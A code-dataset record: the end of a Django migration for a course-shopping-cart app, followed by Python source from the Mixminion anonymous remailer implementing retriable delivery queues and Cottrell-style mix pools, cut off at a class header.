db.delete_column('shoppingcart_paidcourseregistration', 'mode')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
|
crooks/mixminion
|
refs/heads/master
|
lib/mixminion/server/ServerQueue.py
|
1
|
# Copyright 2002-2011 Nick Mathewson. See LICENSE for licensing information.
"""mixminion.server.ServerQueue
Facilities for retriable delivery queues, and for mix pools.
"""
import cPickle
import logging
import math
import os
import operator
import time
import stat
import sys
import threading
import mixminion.Filestore
from mixminion.Common import MixError, MixFatalError, secureDelete, \
createPrivateDir, readPickled, writePickled, formatTime, readFile, \
ceilDiv
from mixminion.Crypto import getCommonPRNG
from mixminion.Filestore import CorruptedFile
__all__ = [ 'DeliveryQueue', 'TimedMixPool', 'CottrellMixPool',
'BinomialCottrellMixPool', 'PerAddressDeliveryQueue' ]
log = logging.getLogger(__name__)
def _calculateNext(lastAttempt, firstAttempt, retrySchedule, canDrop, now):
"""DOCDOC"""
# If we've never tried to deliver the message, it's ready to
# go immediately.
if lastAttempt is None:
return now
# Otherwise, we count from the time the message was first queued,
# until we find a scheduled delivery that falls after the last
# attempted delivery.
#
# This scheduled delivery may be in the past. That's okay: it only
# means that we've missed a scheduled delivery, and we can try again
# immediately.
attempt = firstAttempt
for interval in retrySchedule:
attempt += interval
if attempt > lastAttempt:
return attempt
# Oops: there are no scheduled deliveries after the last delivery.
# Time to drop this message, or go into holding mode.
if canDrop:
return None
else:
        if not retrySchedule or retrySchedule[-1]<5:
            # Guard against an empty or degenerate schedule: fall back to
            # retrying once an hour.
            retrySchedule = [3600]
attempt += (ceilDiv(lastAttempt-attempt+60,retrySchedule[-1]) *
retrySchedule[-1])
return attempt
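# Illustrative sketch (not part of the original module): a worked example of
# how _calculateNext walks a retry schedule.  With firstAttempt=0 and a
# schedule of [120, 120, 3600], a message last tried at t=130 is next
# scheduled at t=240: the scan visits 0+120=120 (not after the last attempt)
# and then 120+120=240 (after it).
def _exampleCalculateNext():
    return _calculateNext(lastAttempt=130, firstAttempt=0,
                          retrySchedule=[120, 120, 3600], canDrop=1, now=200)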
class _DeliveryState:
"""Helper class: holds the state needed to schedule delivery or
eventual abandonment of a message in a DeliveryQueue."""
## Fields:
# queuedTime: time at which the corresponding message was first
# inserted into the queue.
# lastAttempt: The most recent time at which we attempted to
# deliver the message. (None means 'never').
# address: Pickleable object holding address information. Delivery
# code uses this field to group messages by address before loading
# them all from disk. Must be usable as hash key.
# pendingAt: None (if we're not sending this message), or a time
    #    at which we began sending this message.
# nextAttempt: None, or the time at which we'll next try to send
# this message. This field is invalid until someone calls
# setNextAttempt. If the time is in the past, delivery can
# be tried now. If None, the message may be removable.
def __init__(self, queuedTime=None, lastAttempt=None, address=None):
"""Create a new _DeliveryState for a message received at
queuedTime (default now), whose last delivery attempt was
at lastAttempt (default never)."""
if queuedTime is None:
queuedTime = time.time()
self.queuedTime = queuedTime
self.lastAttempt = lastAttempt
self.address = address
self.pending = None
self.nextAttempt = None
self.remove = 0
def isPending(self):
"""Return true iff we are currently trying to deliver this message."""
return self.pending is not None
def setPending(self, now=None):
"""Note that we are now trying to deliver this message, so that we
don't try to deliver it twice at the same time."""
if now is None:
now = time.time()
self.pending = now
def setNonPending(self):
"""Note that we are no longer trying to deliver this message, so that
we can try it again later."""
self.pending = None
def isRemovable(self):
"""Return true iff this message is old enough to be removed."""
return self.remove
def __getstate__(self):
# For pickling. All future versions of deliverystate will pickle
# to a tuple, whose first element will be a version string.
return ("V1", self.queuedTime, self.lastAttempt, self.address)
def __setstate__(self, state):
# For pickling.
if state[0] == "V1":
self.queuedTime = state[1]
self.lastAttempt = state[2]
self.address = state[3]
else:
#XXXX008 This is way too extreme.
raise MixFatalError("Unrecognized delivery state")
self.pending = None
self.nextAttempt = None
self.remove = 0
def setNextAttempt(self, retrySchedule, now=None):
"""Return the next time when we should try to deliver this message
according to the provided retrySchedule. If the time returned
is in the past, then immediate delivery is okay. If the time
returned is None, this message has expired and should be forgotten.
"""
if not now:
now = time.time()
self.remove = 0
self.nextAttempt = _calculateNext(self.lastAttempt, self.queuedTime,
retrySchedule, canDrop=1, now=now)
if self.nextAttempt is None:
self.remove = 1
def setLastAttempt(self, when):
"""Update time of the last attempted delivery."""
self.lastAttempt = when
class PendingMessage:
"""PendingMessage represents a message in a DeliveryQueue, for delivery
to a specific address. See DeliveryQueue._deliverMessages for more
information about the interface."""
##
# queue: the deliveryqueue holding this message
# handle: the handle for this message in the queue
# address: The address passed to queueDeliveryMessage for this message,
# or None
# message: The object queued as this message, or None if the object
# has not yet been loaded.
def __init__(self, handle, queue, address, message=None):
self.handle = handle
self.queue = queue
self.address = address
self.message = message
def getAddress(self):
return self.address
def getHandle(self):
return self.handle
def succeeded(self,now=None):
"""Mark this message as having been successfully deleted, removing
it from the queue."""
self.queue.deliverySucceeded(self.handle,now=now)
self.queue = self.message = None
def failed(self, retriable=0, now=None):
"""Mark this message as has having failed delivery, either rescheduling
it or removing it from the queue."""
self.queue.deliveryFailed(self.handle, retriable, now=now)
self.queue = self.message = None
def getMessage(self):
"""Return the underlying object stored in the delivery queue, loading
it from disk if necessary. May raise CorruptedFile."""
assert self.handle is not None
if self.message is None:
self.message = self.queue.store.getObject(self.handle)
return self.message
class DeliveryQueue:
"""A DeliveryQueue implements a queue that greedily sends messages to
outgoing streams that occasionally fail. All underlying messages
are pickled objects. Additionally, we store metadata about
attempted deliveries in the past, so we know when to schedule the
next delivery.
This class is abstract. Implementors of this class should subclass
it to add a _deliverMessages method. Multiple invocations of this
method may be active at a given time. Upon success or failure, this
method should cause deliverySucceeded or deliveryFailed to be called
as appropriate.
Users of this class will probably only want to call the
queueDeliveryMessage, sendReadyMessages, and nextMessageReadyAt
methods.
This class caches information about the directory state; it won't
play nice if multiple instances are looking at the same directory.
"""
###
# Fields:
# store -- An ObjectMetadataStore to back this queue. The objects
# are instances of whatever deliverable object this queue contains;
# the metadata are instances of _DeliveryState.
# retrySchedule -- a list of intervals at which delivery of messages
# should be reattempted, as described in "setRetrySchedule".
# _lock -- a reference to the RLock used to control access to the
# store.
def __init__(self, location, retrySchedule=None, now=None, name=None):
"""Create a new DeliveryQueue object that stores its files in
<location>. If retrySchedule is provided, it is interpreted as
in setRetrySchedule. Name, if present, is a human-readable
name used in log messages."""
self.store = mixminion.Filestore.ObjectMetadataStore(
location,create=1,scrub=1)
self._lock = self.store._lock
if name is None:
self.qname = os.path.split(location)[1]
else:
self.qname = name
self.retrySchedule = None
self._rescan()
if retrySchedule is not None:
self.setRetrySchedule(retrySchedule, now)
else:
self.setRetrySchedule([0], now)
self._repOK()
def setRetrySchedule(self, schedule, now=None):
"""Set the retry schedule for this queue. A retry schedule is
a list of integers, each representing a number of seconds.
For example, a schedule of [ 120, 120, 3600, 3600 ] will
cause undeliverable messages to be retried after 2 minutes,
then 2 minutes later, then 1 hour later, then 1 hour later.
Retry schedules are not strictly guaranteed, for two reasons:
1) Message delivery can fail _unretriably_, in which case
no further attempts are made.
2) Retries are only actually attempted when sendReadyMessages
is called. If the schedule specifies retry attempts at
10-second intervals, but sendReadyMessages is invoked only
           every 30 minutes, messages will only be retried once every
30 minutes.
"""
try:
self._lock.acquire()
self.retrySchedule = schedule[:]
self._rebuildNextAttempt(now)
finally:
self._lock.release()
def _rescan(self, now=None):
"""Helper: Rebuild the internal state of this queue from the
underlying directory. After calling 'rescan',
_rebuildNextAttempt must be called to recalculate our
delivery schedule."""
try:
self._lock.acquire()
self.store.loadAllMetadata(lambda h: _DeliveryState())
self._rebuildNextAttempt(now)
self._repOK()
finally:
self._lock.release()
def getAllMessages(self):
"""Return handles for all messages in the store."""
return self.store.getAllMessages()
def count(self):
"""Return the number of messages in the store."""
return self.store.count()
def _rebuildNextAttempt(self, now=None):
"""Helper: Reconstruct self.nextAttempt from self.retrySchedule and
self.deliveryState. DOCDOC
Callers must hold self._lock.
"""
if self.retrySchedule is None:
rs = [0]
else:
rs = self.retrySchedule
for ds in self.store._metadata_cache.values():
ds.setNextAttempt(rs, now)
self._repOK()
def _repOK(self):
"""Raise an assertion error if the internal state of this object is
nonsensical."""
# XXXX Later in the release cycle, we should call this *even* less.
# XXXX It adds ~8-9ms on my laptop for ~400 messages
try:
self._lock.acquire()
allHandles = self.store.getAllMessages()
allHandles.sort()
dsHandles = self.store._metadata_cache.keys()
dsHandles.sort()
assert allHandles == dsHandles
finally:
self._lock.release()
def queueDeliveryMessage(self, msg, address=None, now=None):
"""Schedule a message for delivery.
msg -- the message. This can be any pickleable object.
"""
assert self.retrySchedule is not None
try:
self._lock.acquire()
ds = _DeliveryState(now,None,address)
ds.setNextAttempt(self.retrySchedule, now)
handle = self.store.queueObjectAndMetadata(msg, ds)
log.trace("DeliveryQueue got message %s for %s",
handle, self.qname)
finally:
self._lock.release()
return handle
def _inspect(self,handle):
"""Returns a (msg, inserted, lastAttempt, nextAttempt) tuple
for a given message handle. For testing. """
self._repOK()
o = self.store.getObject(handle)
ds = self.store.getMetadata(handle)
return (o, ds.queuedTime, ds.lastAttempt, ds.nextAttempt)
def removeExpiredMessages(self, now=None):
"""Remove every message expired in this queue according to the
           current schedule.  Ordinarily, messages are removed as their last
           scheduled delivery attempt fails.  Occasionally, however,
changing the schedule while the system is down can make calling
this method useful."""
try:
self._lock.acquire()
#XXXX
for h, ds in self.store._metadata_cache.items():
if ds.isRemovable():
self.removeMessage(h)
finally:
self._lock.release()
def sendReadyMessages(self, now=None):
"""Sends all messages which are not already being sent, and which
are scheduled to be sent."""
assert self.retrySchedule is not None
self._repOK()
if now is None:
now = time.time()
log.trace("DeliveryQueue checking for deliverable messages in %s",
self.qname)
try:
self._lock.acquire()
messages = []
for h in self.store._metadata_cache.keys():
try:
state = self.store.getMetadata(h)
except CorruptedFile:
continue
if state.isPending():
#log.trace(" [%s] is pending delivery", h)
continue
elif state.isRemovable():
#log.trace(" [%s] is expired", h)
self.removeMessage(h)
elif state.nextAttempt <= now:
#log.trace(" [%s] is ready for delivery", h)
                    addr = state.address
messages.append(PendingMessage(h,self,addr))
state.setPending(now)
else:
#log.trace(" [%s] is not yet ready for redelivery", h)
continue
finally:
self._lock.release()
self._deliverMessages(messages)
self._repOK()
def _deliverMessages(self, msgList):
"""Abstract method; Invoked with a list of PendingMessage objects
every time we have a batch of messages to send.
For every PendingMessage object on the list, the object's
.succeeded() or .failed() method should eventually be called, or
the message will sit in the queue indefinitely, without being
retried."""
# We could implement this as a single _deliverMessage(h,addr)
# method, but that wouldn't allow implementations to batch
# messages being sent to the same address.
raise NotImplementedError("_deliverMessages")
def removeMessage(self, handle):
self.store.removeMessage(handle)
def cleanQueue(self, secureDeleteFn=None):
self.store.cleanQueue(secureDeleteFn)
def removeAll(self, secureDeleteFn=None):
try:
self._lock.acquire()
self.store.removeAll(secureDeleteFn)
self.cleanQueue()
finally:
self._lock.release()
def deliverySucceeded(self, handle, now=None):
"""Removes a message from the outgoing queue. This method
should be invoked after the corresponding message has been
successfully delivered.
"""
assert self.retrySchedule is not None
log.trace("DeliveryQueue got successful delivery for %s from %s",
handle, self.qname)
self.removeMessage(handle)
def deliveryFailed(self, handle, retriable=0, now=None):
"""Removes a message from the outgoing queue, or requeues it
for delivery at a later time. This method should be
invoked after the corresponding message has been
unsuccessfully delivered."""
assert self.retrySchedule is not None
log.trace("DeliveryQueue failed to deliver %s from %s",
handle, self.qname)
try:
self._lock.acquire()
try:
ds = self.store.getMetadata(handle)
except KeyError:
ds = None
except CorruptedFile:
return
if ds is None:
# This should never happen
log.exception("Handle %s had no state", handle)
ds = _DeliveryState(now)
ds.setNextAttempt(self.retrySchedule, now)
self.store.setMetadata(handle, ds)
return
if not ds.isPending():
log.error("Handle %s was not pending", handle)
return
last = ds.pending
ds.setNonPending()
if retriable:
# If we can retry the message, update the deliveryState
# with the most recent attempt, and see if there's another
# attempt in the future.
ds.setLastAttempt(last)
ds.setNextAttempt(self.retrySchedule, now)
if ds.nextAttempt is not None:
# There is another scheduled delivery attempt. Remember
# it, mark the message sendable again, and save our state.
log.trace(" (We'll try %s again at %s)", handle,
formatTime(ds.nextAttempt, 1))
self.store.setMetadata(handle, ds)
return
else:
assert ds.isRemovable()
# Otherwise, fallthrough.
# If we reach this point, the message is undeliverable, either
# because 'retriable' is false, or because we've run out of
# retries.
log.trace(" (Giving up on %s)", handle)
self.removeMessage(handle)
finally:
self._lock.release()
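# Minimal sketch (illustrative, not part of the original module): the smallest
# useful DeliveryQueue subclass.  It "delivers" by logging each pending
# message and immediately reporting success, which removes it from the queue.
class _ExampleLogDeliveryQueue(DeliveryQueue):
    def _deliverMessages(self, msgList):
        for pm in msgList:
            log.trace("would deliver %s to address %r",
                      pm.getHandle(), pm.getAddress())
            pm.succeeded()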
class _AddressState:
"""DOCDOsC"""
def __init__(self, address):
self.address = address
self.lastSuccess = self.lastFailure = self.firstFailure = None
def __getstate__(self):
return ("ADDR-V1", self.address, self.lastSuccess,
self.lastFailure, self.firstFailure)
def __setstate__(self, state):
if state[0] == 'ADDR-V1':
_, self.address, self.lastSuccess, self.lastFailure, \
self.firstFailure = state
else:
#XXXX008 This is way too extreme.
raise MixFatalError("Unrecognized delivery state")
self.nextAttempt = None
def setNextAttempt(self, retrySchedule, now=None):
if not now:
now = time.time()
self.nextAttempt = _calculateNext(self.lastFailure,
self.firstFailure,
retrySchedule, canDrop=0, now=now)
def getLastActivity(self):
events = [ e for e in [self.lastSuccess, self.lastFailure]
if e is not None ]
if events:
return max(events)
else:
return None
def succeeded(self, now=None):
if not now:
now = time.time()
self.lastSuccess = now
self.lastFailure = None
self.firstFailure = None
def failed(self, attempt, now=None):
if not now:
now = time.time()
if not self.firstFailure:
self.firstFailure = attempt
self.lastFailure = attempt
class PerAddressDeliveryQueue(DeliveryQueue):
"""Implementats the same interface as DeliveryQueue, but retries
messages on a per-address basis rather than a per-message
basis. That is, if any message to the address X fails, we wait
for the first retry interval before retrying _any_ messages fo
address X; and when address X succeeds again, we retry _all_
messages to X.
"""
# This turns out to have important anonymity implications: Suppose
# that we retry messages independently, and that our retry policy
# is 'every 1 hour for 1 day, every 12 hours for 1 week'. Suppose
# that the server B is down. The following sequence of events
# could occur:
#
# 1. At Hour 0, we receive message M1, and soon try to
# deliver it to B; it fails, we hold it in the queue. We
# retry M1 every hour for 24 hours.
#
# 2. At Hour 30, B comes back up again.
#
# 3. At Hour 32, we receive message M2, and soon try to
# deliver it. The delivery succeeds.
#
# 4. At Hour 36, we reattempt message M1 and succeed.
#
# An observer who is watching us can tell that the message which
# we delivered to B in step 3 could not have been the same message
# as we attempted to deliver in step 1. Furthermore, such an
    # observer can deduce that the message we attempted to deliver in
# step 1 was successfully delivered in step 4. This information
# could be helpful to traffic analysis.
#
# With the algorithm implemented in this class, the address B
# would be retried at Hour 36, and both messages M1 and M2 would
# be delivered at the same time. The adversary knows that at
# least one of M1 and M2 has been waiting around since hour 0, but
# does not know which of them (if either!) arrived later.
#
# We use this algorithm for packet delivery. With email, on the
# other hand, we just pass messages to our MTA and let it cope
# correctly: most (all?) MTAs use a retry algorithm equivalent to
# this one.
    ## Fields (in addition to DeliveryQueue's):
    # addressStateDB: a WritethroughDict mapping str(address) to the
    #    _AddressState for that address.
def __init__(self, location, retrySchedule=None, now=None, name=None):
self.addressStateDB = mixminion.Filestore.WritethroughDict(
filename=os.path.join(location,"addressStatus.db"),
purpose="address state")
if retrySchedule is None:
retrySchedule = [3600]
DeliveryQueue.__init__(self, location=location,
retrySchedule=retrySchedule, now=now, name=name)
def sync(self):
self._lock.acquire()
try:
self.addressStateDB.sync()
finally:
self._lock.release()
def _rescan(self):
try:
self._lock.acquire()
DeliveryQueue._rescan(self)
finally:
self._lock.release()
def _rebuildNextAttempt(self, now=None):
self._lock.acquire()
try:
for ds in self.store._metadata_cache.values():
if not self.addressStateDB.has_key(str(ds.address)):
as_ = _AddressState(ds.address)
self.addressStateDB[str(ds.address)] = as_
if not self.retrySchedule:
rs = [3600]
self.totalLifetime = 3600
else:
rs = self.retrySchedule
self.totalLifetime = reduce(operator.add,self.retrySchedule,0)
for addr_state in self.addressStateDB.values():
addr_state.setNextAttempt(rs, now)
self._repOK()
finally:
self._lock.release()
def removeExpiredMessages(self, now=None):
"""DOCDOC"""
assert self.retrySchedule is not None
self._lock.acquire()
try:
have = {}
for h, ds in self.store._metadata_cache.items():
if ds.queuedTime + self.totalLifetime < now:
self.removeMessage(h)
else:
have[ds.address]=1
for k, addr_state in self.addressStateDB.items():
if have.has_key(addr_state.address):
continue
lastActivity = addr_state.getLastActivity()
if lastActivity and (
lastActivity + self.totalLifetime < now):
del self.addressStateDB[k]
finally:
self._lock.release()
def _getAddressState(self, address, now=None):
try:
addr_state = self.addressStateDB[str(address)]
except KeyError:
addr_state = self.addressStateDB[str(address)] = _AddressState(address)
addr_state.setNextAttempt(self.retrySchedule, now)
return addr_state
def queueDeliveryMessage(self, msg, address, now=None):
self._getAddressState(address, now=now)
return DeliveryQueue.queueDeliveryMessage(self,msg,address,now)
def sendReadyMessages(self, now=None):
if now is None:
now = time.time()
self._lock.acquire()
try:
messages = []
for h in self.store._metadata_cache.keys():
try:
state = self.store.getMetadata(h)
except CorruptedFile:
continue
if state.isPending():
#log.trace(" [%s] is pending delivery", h)
continue
elif state.queuedTime + self.totalLifetime < now:
#log.trace(" [%s] is expired", h)
self.removeMessage(h)
continue
addressState = self._getAddressState(state.address, now)
if addressState.nextAttempt <= now:
#log.trace(" [%s] is ready for next attempt on %s", h,
# state.address)
messages.append(PendingMessage(h,self,state.address))
state.setPending(now)
else:
#log.trace(" [%s] will wait for next attempt on %s",h,
# state.address)
continue
finally:
self._lock.release()
self._deliverMessages(messages)
def cleanQueue(self, secureDeleteFn=None):
self.sync()
self.store.cleanQueue(secureDeleteFn)
def close(self):
self.addressStateDB.close()
def deliverySucceeded(self, handle, now=None):
assert self.retrySchedule is not None
self._lock.acquire()
try:
log.trace("PerAddressDeliveryQueue got successful delivery for %s from %s",
handle, self.qname)
try:
mState = self.store.getMetadata(handle)
except CorruptedFile:
mState = None
if mState:
aState = self._getAddressState(mState.address, now)
aState.succeeded(now=now)
aState.setNextAttempt(self.retrySchedule, now)
self.addressStateDB[str(mState.address)] = aState
self.removeMessage(handle)
finally:
self._lock.release()
def deliveryFailed(self, handle, retriable=0, now=None):
assert self.retrySchedule is not None
if now is None:
now = time.time()
self._lock.acquire()
try:
try:
mState = self.store.getMetadata(handle)
except KeyError:
mState = None
except CorruptedFile:
mState = None
if mState is None:
# This should never happen
log.exception("Handle %s had no state; removing", handle)
self.removeMessage(handle)
return
elif not mState.isPending():
log.error("Handle %s was not pending", handle)
return
last = mState.pending
mState.setNonPending()
if not retriable:
log.trace(" (Giving up on %s)", handle)
self.removeMessage(handle)
aState = self._getAddressState(mState.address, now)
aState.failed(attempt=last,now=now)
aState.setNextAttempt(self.retrySchedule,now=now)
self.addressStateDB[str(aState.address)] = aState # flush to db.
finally:
self._lock.release()
def _inspect(self,handle):
"""Returns a (msg, state, addressState) tuple for a given
message handle. For testing."""
self._repOK()
o = self.store.getObject(handle)
ds = self.store.getMetadata(handle)
addr_state = self._getAddressState(ds.address)
return (o, ds, addr_state)
def _repOK(self):
"""Raise an assertion error if the internal state of this object is
nonsensical."""
# XXXX Later in the release cycle, we should call this *even* less.
# XXXX It adds ~8-9ms on my laptop for ~400 messages
self._lock.acquire()
try:
DeliveryQueue._repOK(self)
for h in self.store._metadata_cache.keys():
ds = self.store._metadata_cache[h]
addr_state = self._getAddressState(ds.address)
assert addr_state.address == ds.address
finally:
self._lock.release()
class TimedMixPool(mixminion.Filestore.ObjectStore):
"""A TimedMixPool holds a group of files, and returns some of them
as requested, according to a mixing algorithm that sends a batch
of messages every N seconds."""
## Fields:
# interval: scanning interval, in seconds.
def __init__(self, location, interval=600):
"""Create a TimedMixPool that sends its entire batch of messages
every 'interval' seconds."""
mixminion.Filestore.ObjectStore.__init__(
self, location, create=1, scrub=1)
self.interval = interval
def getBatch(self):
"""Return handles for all messages that the pool is currently ready
to send in the next batch"""
return self.pickRandom()
def getInterval(self):
return self.interval
class CottrellMixPool(TimedMixPool):
"""A CottrellMixPool holds a group of files, and returns some of them
as requested, according the Cottrell (timed dynamic-pool) mixing
algorithm from Mixmaster."""
## Fields:
# interval: scanning interval, in seconds.
# minPool: Minimum number of messages to keep in pool.
# minSend: Minimum number of messages above minPool before we consider
# sending.
# sendRate: Largest fraction of the pool to send at a time.
def __init__(self, location, interval=600, minPool=6, minSend=1,
sendRate=.7):
"""Create a new queue that yields a batch of message every 'interval'
seconds, always keeps <minPool> messages in the pool, never sends
unless it has <minPool>+<minSend> messages, and never sends more
than <sendRate> * the current pool size.
If 'minSend'==1, this is a real Cottrell (type II style) mix pool.
Otherwise, this is a generic 'timed dynamic-pool' mix pool. (Note
           that it is still a matter of some controversy whether it ever
makes sense to set minSend != 1.)
"""
# Note that there was a bit of confusion here: earlier versions
# implemented an algorithm called "mixmaster" that wasn't actually the
# mixmaster algorithm. I picked up the other algorithm from an early
# draft of Roger, Paul, and Andrei's 'Batching Taxonomy' paper (since
# corrected); they seem to have gotten it from Anja Jerichow's
# Phd. thesis ("Generalization and Security Improvement of
# Mix-mediated Anonymous Communication") of 2000.
#
# *THIS* is the algorithm that the current 'Batching Taxonomy' paper
# says that Cottrell says is the real thing.
TimedMixPool.__init__(self, location, interval)
self.minPool = minPool
self.minSend = minSend
self.sendRate = sendRate
def _getBatchSize(self):
"Helper method: returns the number of messages to send."
pool = self.count()
if pool >= (self.minPool + self.minSend):
sendable = pool - self.minPool
return min(sendable, max(1, int(pool * self.sendRate)))
else:
return 0
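    # Worked example (illustrative): with the defaults minPool=6, minSend=1,
    # sendRate=0.7 and 10 messages pooled, sendable = 10 - 6 = 4 and
    # int(10 * 0.7) = 7, so _getBatchSize returns min(4, max(1, 7)) = 4.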
def getBatch(self):
"Returns a list of handles for the next batch of messages to send."
n = self._getBatchSize()
if n:
return self.pickRandom(n)
else:
return []
class _BinomialMixin:
"""Mixin class. Given a MixPool that defines a _getBatchSize function,
replaces the getBatch function with one that -- instead of sending N
messages from a pool of size P, sends each message with probability
N/P. (Alternatively, the MixPool can define a _getFraction function,
       in which case we'll send messages with probability _getFraction().)"""
def _getFraction(self):
n = self._getBatchSize()
count = self.count()
if n == 0 or count == 0:
return 0.0
return n / float(count)
def getBatch(self):
msgProbability = self._getFraction()
rng = getCommonPRNG()
return rng.shuffle([ h for h in self.getAllMessages()
if rng.getFloat() < msgProbability ])
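# Note (illustrative): sending each of P pooled messages independently with
# probability n/P leaves the *expected* batch size at n, but the realized
# size is Binomial(P, n/P), so batch sizes vary from round to round even
# when the pool size does not.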
class BinomialCottrellMixPool(_BinomialMixin,CottrellMixPool):
"""Same algorithm as CottrellMixPool, but instead of sending N messages
from the pool of size P, sends each message with probability N/P."""
if 0:
class BinomialPlusMixPool(_BinomialMixin,CottrellMixPool):
"""As presented in Serjantov, PET 2007, 'A Fresh Look at the
Generalized Mix Framework.' (Testing only.)"""
constant_K = 0.01
def _getFraction(self):
""" g(M) = 1 - \frac{(M-n)e^{-kM}+n}{M} """
M = self.count()
n = self.minPool
return 1 - ( (M - n)*math.exp(-self.constant_K * M) + n )/float(M)
class LogGeneralMixPool(_BinomialMixin, TimedMixPool):
